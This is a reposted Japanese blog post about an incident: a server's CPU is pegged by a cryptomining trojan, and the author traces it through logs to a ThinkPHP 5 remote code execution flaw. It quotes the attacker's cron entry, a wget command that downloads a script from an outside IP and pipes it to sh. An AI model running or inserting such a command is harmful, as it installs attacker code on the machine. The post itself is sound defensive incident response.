ホームページ > PHPフレームワーク > ThinkPHP > トロイの木馬の駆除体験: thinkphp5 のリモート コード実行の脆弱性を悪用したトロイの木馬への対処

トロイの木馬の駆除体験: thinkphp5 のリモート コード実行の脆弱性を悪用したトロイの木馬への対処

藏色散人
リリース: 2021-04-07 08:45:31
転載
2800 人が閲覧しました

thinkphp の次のチュートリアル コラムでは、thinkphp5 のリモート コード実行の脆弱性を悪用するトロイの木馬に対処する方法を紹介します。

トロイの木馬の駆除体験: thinkphp5 のリモート コード実行の脆弱性を悪用したトロイの木馬への対処

トロイの木馬を削除した経験を思い出してください: thinkphp5 のリモート コード実行の脆弱性を悪用したトロイの木馬に対処する

昨日、私は次のことを発見しました。サーバーが突然遅くなりました 上部は、いくつかのプロセスの CPU 使用率が 100% を超えていることを示しています

実行コマンドは:

/tmp/php  -s /tmp/p2.conf
ログイン後にコピー

基本的にハングしていることは確実です

次のステップはソースを特定することです

last ログイン レコードがありません

最初にこれらのプロセスを強制終了しますが、数分後に再び表示されます

内容を見てみましょうこのトロイの木馬が最初に実行したいことは、

netstat このトロイの木馬がポートを開いて、海外の特定の IP との接続を確立したことを参照してください

しかし、tcpdump はしばらくデータ転送を検出できませんでした

彼は何がしたかったのですか?

ログの確認を続けます

cron ログで、www ユーザーが crontab タイミング操作を行っていることがわかりました。これが基本的に問題です

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
ログイン後にコピー

いくつかの問題をダウンロードしましたこれはマイニング トロイの木馬プログラムのようです

サーバー上の www ユーザーは、lnmp をインストールすることによって作成されました。ソースを見ると、おそらく Web の脆弱性です。

/tmp の下にある php の権限を確認してください。www

lnmp の下にあるいくつかのサイトのログを確認すると、thinkphp 5

で最近明らかになったリモート コード実行の脆弱性が使用されていることがわかります。

脆弱性の詳細: https://nosec.org/home/detail/2050.html

問題を修正して解決してください

ただし、このサイトはテスト サイトであり、ポートがリッスンしています。は 8083 です。ハッカーが今、型破りなポートを盗聴し始められるでしょうか?

出典: https://www.simapple.com/425.html

関連する推奨事項:

最新の 10 件の thinkphp ビデオ チュートリアル

以上がトロイの木馬の駆除体験: thinkphp5 のリモート コード実行の脆弱性を悪用したトロイの木馬への対処の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
ソース:simapple
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート